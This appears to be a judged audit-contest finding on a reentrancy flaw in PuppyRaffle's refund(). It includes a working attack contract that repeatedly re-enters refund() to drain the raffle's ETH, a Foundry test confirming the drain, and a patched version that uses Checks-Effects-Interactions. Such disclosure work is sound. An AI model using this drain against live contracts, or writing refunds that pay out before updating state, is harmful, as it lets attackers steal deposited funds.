Submission Details
Severity: high
Valid

Reentrancy Attack Leading to Fund Draining

Summary

The `refund()` function does not follow the Checks, Effects, Interactions (CEI) pattern: it performs the external call (sending ETH to the caller) before it updates the contract's state. A contract receiving the refund can therefore call `refund()` again from its `receive()` function before the first call has recorded the refund, and be paid repeatedly. Applying CEI in `refund()` removes this vulnerability.

Impact

An attacker who has entered the raffle can drain all ETH held by the contract.

Hack function

Smart contract used for the proof of concept:

// SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;

import { PuppyRaffle } from "./PuppyRaffle.sol";

contract RefundHack {
    PuppyRaffle private immutable target;

    constructor(address _target) {
        target = PuppyRaffle(_target);
    }

    // Enters the raffle with this contract as the single player, then requests a refund.
    function attack() external payable {
        require(msg.value == target.entranceFee(), "Invalid entrance Fee");
        address[] memory arg = new address[](1);
        arg[0] = address(this);
        bytes memory data = abi.encodeWithSelector(PuppyRaffle.enterRaffle.selector, arg);
        (bool success, ) = address(target).call{ value: msg.value }(data);
        require(success, "Something went wrong");
        uint256 targetIndex = target.getActivePlayerIndex(address(this));
        target.refund(targetIndex);
    }

    // Called when the refund arrives; the player slot has not been cleared yet,
    // so refund() can be re-entered until the raffle balance is exhausted.
    receive() external payable {
        uint256 targetIndex = target.getActivePlayerIndex(address(this));
        while (address(target).balance >= target.entranceFee()) {
            target.refund(targetIndex);
        }
    }
}

Test Function

function testReentrancyAttackRefund() public {
    RefundHack refundHack = new RefundHack(address(puppyRaffle));
    // Three honest players enter first so the raffle holds funds to drain.
    address[] memory players = new address[](3);
    players[0] = playerOne;
    players[1] = playerTwo;
    players[2] = address(3);
    puppyRaffle.enterRaffle{ value: entranceFee * 3 }(players);
    refundHack.attack{ value: entranceFee }();
    // The raffle is emptied; the attacker holds its own fee plus the three honest fees.
    assert(address(puppyRaffle).balance == 0);
    assert(address(refundHack).balance == 4 ether);
}

Tools Used

Foundry

Recommendations

Follow the Checks, Effects, Interactions pattern in `refund()`: validate the caller, update the player's state so the slot is marked as refunded, and only then send the ETH. A reentrancy guard (mutex) on `refund()` is a reasonable second line of defence.
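The following contract is an added illustration of the recommendation, not code from the submission or from the PuppyRaffle repository; the storage shape (a `players` array and an `entranceFee`) is assumed from the interface the proof of concept calls. The player slot is cleared before the transfer, so a re-entered `refund()` fails its own checks instead of paying again, and a mutex is added as defence in depth.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;

// Added example (assumed layout), not the PuppyRaffle source.
contract RaffleRefundCEI {
    uint256 public immutable entranceFee;
    address[] public players;
    bool private locked; // simple mutex, second line of defence

    event RaffleRefunded(address indexed player);

    constructor(uint256 _entranceFee) {
        entranceFee = _entranceFee;
    }

    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    function enterRaffle(address[] memory newPlayers) external payable {
        require(msg.value == entranceFee * newPlayers.length, "must send enough to enter raffle");
        for (uint256 i = 0; i < newPlayers.length; i++) {
            players.push(newPlayers[i]);
        }
    }

    function refund(uint256 playerIndex) external nonReentrant {
        // Checks: caller owns the slot and it has not been refunded already.
        address playerAddress = players[playerIndex];
        require(playerAddress == msg.sender, "only the player can refund");
        require(playerAddress != address(0), "already refunded or not active");

        // Effects: clear the slot BEFORE any value leaves the contract, so a
        // nested refund(playerIndex) from the receiver fails the checks above.
        players[playerIndex] = address(0);
        emit RaffleRefunded(playerAddress);

        // Interactions: the external call is the last step.
        (bool sent, ) = payable(msg.sender).call{ value: entranceFee }("");
        require(sent, "refund transfer failed");
    }
}
```

Running the proof-of-concept test above against this version should revert in the nested call ("already refunded or not active") and leave the honest players' fees in the contract.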

Updates

Lead Judging Commences

Hamiltonite Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

reentrancy-in-refund

reentrancy in refund() function
